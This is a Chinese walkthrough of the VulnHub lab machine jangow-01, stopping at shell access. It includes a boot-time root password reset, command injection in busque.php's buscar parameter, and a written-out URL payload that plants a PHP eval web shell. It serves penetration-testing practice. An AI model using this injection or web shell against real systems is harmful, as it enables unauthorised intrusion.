vulnhub靶场-jangow-01-1.0.1(截止至获取shell)

安装靶机后我们发现我们扫描不到靶机的ip,所以我们需要修改靶机的配置文件

系统启动时,长按shift键,选择第二个选项,回车后再选择第二个选项

然后不要回车,按e,进入后向下翻 找到并删除删除"recovery nomodeset"并在最后添加"quiet splash rw init=/bin/bash",修改完成后按F10启动

ro/rw表示以只读(ro)/读写(rw)模式挂载根文件系统;

quiet用于设置静默模式;

splash用于设置启动时的屏幕输出;

init用于指定内核挂载根文件系统后运行的第一个用户空间程序的绝对路径(也有文章描述为设置内核执行的初始化进程名)。

输入passwd修改root账户的密码

修改完成后重启登录,账户名root 密码为刚才修改的密码

使用ipconfig -a 查看自己的网卡名

然后vim /etc/network/interfaces来修改自己的网卡信息

该文件是一个重要的网络配置文件,通常用于配置 Linux 系统中的网络接口和网络参数。它在 Debian 系统及其衍生版本(如 Ubuntu )中广泛使用,用于定义网络接口的配置信息,如IP地址、子网掩码、网关、DNS等。

将此处原先的网卡名称修改为自己的网卡名称

修改完成后按esc 然后 shift+/wq! 保存退出,然后重启靶机,这样kali就能扫描到我们的靶机IP了

扫描到了靶机IP,为192.168.171.129

扫描端口,只存在80端口以及21端口

扫描目录,只存在一个/site目录,访问,查看页面并没有什么功能点

点击Buscar,此时url可能有突破点

我们尝试whoami,成功执行,说明此处存在命令执行漏洞

我们尝试将一句话木马直接写入

http://192.168.171.129/site/busque.php?buscar=echo '<?php @eval($_POST["cmd"])?>' > shell.php

//注意 写入该木马时,echo 后面要写入到指定文件的内容需要用单引号括起来,不可以使用双引号,$_POST里的使不使用单双引号括起来都行

写入成功,我们尝试访问shell.php并执行参数,则获取shell成功,后续使用蚁剑连接即可

相关推荐
小小bugbug4 分钟前
mysql查询的原始返回顺序与limit分页优化
mysql·adb
毕设十刻13 分钟前
基于Vue的迅读网上书城22f4d(程序 + 源码 + 数据库 + 调试部署 + 开发环境配置),配套论文文档字数达万字以上,文末可获取,系统界面展示置于文末
前端·数据库·vue.js
薛定谔的猫198232 分钟前
Langchain(十二)LangGraph 实战入门:用流程图思维构建 LLM 工作流
数据库·microsoft
喵了meme1 小时前
Linux学习日记24:Linux网络编程基础
linux·网络·学习
坐吃山猪1 小时前
ChromaDB02-代码实战
数据库·向量数据库·chromadb
摇滚侠1 小时前
MySQL 中 utf8mb4 字符集,字母a占几个字节,一个汉字占几个字节 / MySQL 中 utf8mb3 字符集,字母a占几个字节,一个汉字占几个字节
数据库·mysql
ChineHe1 小时前
Redis数据类型篇001_数据类型梳理与选择指南
数据库·redis·缓存
whlqjn_12111 小时前
linux下使用SHC对Shell脚本进行封装和源码隐藏
linux·centos
Antoine-zxt1 小时前
MySQL CPU飙升至500%的深度排查与优化实践
数据库·mysql
Awkwardx1 小时前
MySQL数据库—MySQL基本查询
数据库·mysql